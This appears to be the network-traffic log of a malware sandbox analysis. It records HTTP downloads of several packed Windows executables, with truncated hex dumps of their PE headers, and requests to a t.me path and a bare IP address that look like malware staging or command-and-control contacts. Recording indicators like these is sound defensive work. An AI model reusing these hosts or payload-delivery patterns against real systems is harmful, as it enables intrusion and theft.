Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:25 GMTContent-Type: application/octet-streamContent-Length: 1821696Last-Modified: Sat, 01 Feb 2025 16:13:50 GMTConnection: keep-aliveETag: "679e483e-1bcc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 f0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 6a 00 00 04 00 00 e0 6f 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 78 6b 79 68 78 75 77 00 30 1a 00 00 b0 4f 00 00 26 1a 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 64 65 79 74 74 6f 6e 00 10 00 00 00 e0 69 00 00 04 00 00 00 a6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 69 00 00 22 00 00 00 aa 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:18:28 GMTContent-Type: application/octet-streamContent-Length: 3024384Last-Modified: Sat, 01 Feb 2025 16:14:01 GMTConnection: keep-aliveETag: "679e4849-2e2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 d0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 32 00 00 04 00 00 2c 29 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 b6 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 b5 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 69 68 70 78 6a 79 75 00 10 2b 00 00 b0 06 00 00 0a 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 72 75 69 7a 65 61 74 00 10 00 00 00 c0 31 00 00 06 00 00 00 fe 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 31 00 00 22 00 00 00 04 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:19:08 GMTContent-Type: application/octet-streamContent-Length: 1013457Last-Modified: Tue, 28 Jan 2025 06:49:56 GMTConnection: keep-aliveETag: "67987e14-f76d1"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 10 00 00 04 00 00 f5 d7 0f 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 c6 5e 00 00 00 00 00 00 00 00 00 00 69 4e 0f 00 68 28 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c6 5e 00 00 00 00 10 00 00 60 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 60 10 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:19:13 GMTContent-Type: application/octet-streamContent-Length: 1890304Last-Modified: Sat, 01 Feb 2025 15:20:01 GMTConnection: keep-aliveETag: "679e3ba1-1cd800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 cb 85 81 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 28 04 00 00 ba 00 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 3e a5 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 50 05 00 6b 00 00 00 00 40 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 51 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 30 05 00 00 10 00 00 00 7a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 40 05 00 00 02 00 00 00 8a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 50 05 00 00 02 00 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 60 05 00 00 02 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 78 6c 6d 6a 74 6a 69 00 30 1a 00 00 70 30 00 00 22 1a 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 65 77 66 6e 68 6b 00 10 00 00 00 a0 4a 00 00 04 00 00 00 b2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 b6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:19:18 GMTContent-Type: application/octet-streamContent-Length: 1501214Last-Modified: Fri, 24 Jan 2025 15:07:02 GMTConnection: keep-aliveETag: "6793ac96-16e81e"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 bd ea e2 3a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 24 01 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 d4 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 00 60 01 00 00 0c 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d4 02 01 00 00 10 02 00 00 04 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:19:24 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:20:37 GMTContent-Type: application/octet-streamContent-Length: 10584064Last-Modified: Sat, 01 Feb 2025 09:45:44 GMTConnection: keep-aliveETag: "679ded48-a18000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d 82 ee b9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e0 a0 00 00 9e 00 00 00 00 00 00 f2 fd a0 00 00 20 00 00 00 00 a1 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 a1 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 fd a0 00 4f 00 00 00 00 00 a1 00 64 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 a1 00 0c 00 00 00 84 fd a0 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 de a0 00 00 20 00 00 00 e0 a0 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 64 9b 00 00 00 00 a1 00 00 9c 00 00 00 e2 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 a1 00 00 02 00 00 00 7e a1 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 fd a0 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 27 00 00 00 3d 00 00 03 00 02 00 25 00 00 06 8c 64 00 00 f8 98 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 72 01 00 00 70 28 13 00 00 0a 2a a6 17 8d 2a 00 00 01 25 16 20 dd 3a 17 59 9e 80 01 00 00 04 7f 02 00 00 04 fe 15 01 00 00 1b 73 14 00 00 0a 80 03 00 00 04 2a 2e 72 35 00 00 70 28 15 00 00 0a 2a b2 19 8d 2c 00 00 01 25 d0 3a 00 00 04 28 16 00 00 0a 80 04 00 00 04 7f 05 00 00 04 fe 15 02 00 00 1b 73 14 00 00 0a 80 06 00 00 04 2a 2e 72 4f 00 00 70 28 15 00 00 0a 2a 2e 72 7f 00 00 70 28 17 00 00 0a 2a 2e 72 ad 00 00 70 28 13 00 00 0a 2a 2e 72 d3 00 00 70 28 17 00 00 0a 2a 06 2a 06 2a 6e 02 17 8d 2a 00 00 01 25 16 20 16 80 c9 30 9e 7d 07 00 00 04 02 28 18 00 00 0a 2a 2e 72 eb 00 00 70 28 19 00 00 0a 2a a6 02 19 8d 2c 00 00 01 25 d0 36 00 00 04 28 16 00 00 0a 7d 09 00 00 04 02 73 14 00 00 0a 7d 0b 00 00 04 02 28 18 00 00 0a 2a 2e 72 05 01 00 70 28 1a 00 00 0a 2a 2e 72 3d 01 00 70 28 1b 00 00 0a 2a 00 00 00 1b 30 04 00 7b 00 00 00 01 00 00 11 73 1c 00 00 0a 0a 73 1d 00 00 0a 0b 07 28 1e 00 00 0a 03 6f 1f 00 00 0a 6f 20 00 00 0a 0c 06 0

Source: global traffic	HTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
